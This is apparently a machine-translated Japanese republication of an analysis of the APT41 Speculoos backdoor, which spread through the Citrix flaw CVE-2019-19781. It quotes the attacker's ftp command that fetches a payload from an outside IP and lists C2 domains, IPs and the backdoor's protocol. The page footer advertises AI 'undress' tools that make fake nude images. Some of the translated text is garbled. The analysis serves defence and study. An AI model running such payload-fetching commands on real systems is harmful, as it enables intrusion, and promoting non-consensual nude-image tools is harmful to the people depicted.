FireEye は、2020 年 3 月 25 日に、APT41 の世界的な攻撃活動に関するレポートをリリースしました。この攻撃キャンペーンは 1 月 20 日から 3 月 11 日まで発生し、主に Citrix、Cisco、Zoho のネットワーク機器を標的としていました。研究者らは、WildFireとAutoFocusのデータに基づいてCitrixデバイスを標的とした攻撃サンプル「Speculoos」を入手し、北米、南米、欧州を含む世界中の複数の業界で被害者を特定した。
Speculoos は FreeBSD に基づいて実装されています。合計 5 つのサンプルが特定されました。すべてのサンプルのファイル サイズは基本的に同じですが、サンプル間には若干の違いがあります。サンプルセット。 Speculoos は攻撃の伝播に CVE-2019-19781 を悪用します。CVE-2019-19781 は Citrix Application Delivery Controller、Citrix Gateway、および Citrix SD-WAN WANOP に影響を及ぼし、攻撃者が任意のコマンドをリモートで実行できるようにします。
攻撃の詳細
攻撃者は CVE-2019-19781 を悪用して次のコマンドをリモートで実行しました: '/usr/bin/ftp -o /tmp/bsd ftp://test: [編集済み ]\@ 66.42.98[.]220/'。
攻撃の第一波は、2020 年 1 月 31 日の夜に始まり、bsd という名前のファイルを使用し、米国の複数の高等教育機関、米国の医療機関、アイルランドのコンサルティング会社に影響を与えました。攻撃の第 2 波は、ファイル名 un を使用して 2020 年 2 月 24 日に始まり、コロンビアの高等教育機関、オーストリアの製造組織、米国の高等教育機関、米国の州政府に影響を与えました。
BSD システムに基づくマルウェアは比較的まれですが、このツールは特定の Citrix ネットワーク デバイスに関連しているため、Speculoos はこの攻撃活動専用に APT41 組織によって開発される可能性があります。
バイナリ分析
GCC 4.2.1 でコンパイルされた ELF 実行可能ファイルの Speculoos バックドアは、FreeBSD システム上で実行できます。ペイロードはターゲットに対する永続的な制御を維持できないため、攻撃者は追加のコンポーネントまたは他の攻撃方法を使用して制御を維持します。バックドアの実行後、ループが開始され、ポート 443 を介して C2 ドメインと通信し、関数
##alibaba.zzux[.]com (119.28.139[.]120) を呼び出します。 )#通信に問題がある場合、Speculoos はポート 443 (IP アドレス 119.28.139[.]20) を介してバックアップ C2 サーバーに接続しようとします。 C2 サーバーに接続すると、サーバーとの TLS ハンドシェイクが実行されます。図 1 は、C2 サーバーに送信されるパケットを示しています。
サーバー名表示 (SNI) として、login.live[.]com を要求します。
C2 への接続に成功し、TLS ハンドシェイクが完了すると、Speculoos はターゲット システムのフィンガープリントを取得し、データを C2 サーバーに送り返します。その構造を以下の表 1 に示します。
データは TLS チャネル経由で送信され、Speculoos はサーバーからの 2 バイトの応答を待ちます。応答を受信した後、バイト (0xa) を C2 に送信し、コマンドを待つループに入ります。表 2 は、攻撃者が実行できるコマンドを示しており、攻撃者が被害者のシステムを完全に制御できるようになります。
研究で分析された 2 つの Speculoos サンプルは機能的に同一であり、システム情報を収集する際の「ホスト名」の違いは 8 バイトのみです。 「uname -s」コマンド。 uname -s はカーネル情報を返し、hostname はホスト システム名を返します。以下の画像は、2 つの Speculoos サンプル間のバイナリ比較を示しています。
影響評価
権限のないユーザーがリモートからコードを実行できるようにするインターネットにアクセス可能なデバイスは、重大なセキュリティ上の問題を引き起こします。CVE-2019-19781 は影響を及ぼします。攻撃者はこの脆弱性を積極的に悪用してカスタム バックドアをインストールします。影響を受けるすべての組織のネットワーク アクティビティはこれらのネットワーク デバイスを通過する必要があるため、攻撃者は組織全体のネットワーク アクティビティを監視または変更する可能性があります。
デフォルトでは、これらのデバイスは組織のシステムに直接アクセスできるため、攻撃者は内部ネットワーク内の横方向の移動の問題を考慮する必要がありません。サイバー攻撃者は、ネットワーク データの改ざん、悪意のあるコードの挿入、中間者攻撃の実行、ユーザーを偽のログイン ページに誘導してログイン情報を盗むなど、さまざまな攻撃手段を使用します。
以上がAPT41 Speculoos バックドア分析を実行する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。
人気の記事
ホットツール
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
DVWA
Damn Vulnerable Web App (DVWA) は、非常に脆弱な PHP/MySQL Web アプリケーションです。その主な目的は、セキュリティ専門家が法的環境でスキルとツールをテストするのに役立ち、Web 開発者が Web アプリケーションを保護するプロセスをより深く理解できるようにし、教師/生徒が教室環境で Web アプリケーションを教え/学習できるようにすることです。安全。 DVWA の目標は、シンプルでわかりやすいインターフェイスを通じて、さまざまな難易度で最も一般的な Web 脆弱性のいくつかを実践することです。このソフトウェアは、
mPDF
mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。
SublimeText3 英語版
推奨: Win バージョン、コードプロンプトをサポート!
SublimeText3 中国語版
中国語版、とても使いやすい
